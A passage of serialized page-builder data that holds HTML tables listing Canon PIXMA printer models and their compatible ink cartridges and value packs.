<td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA 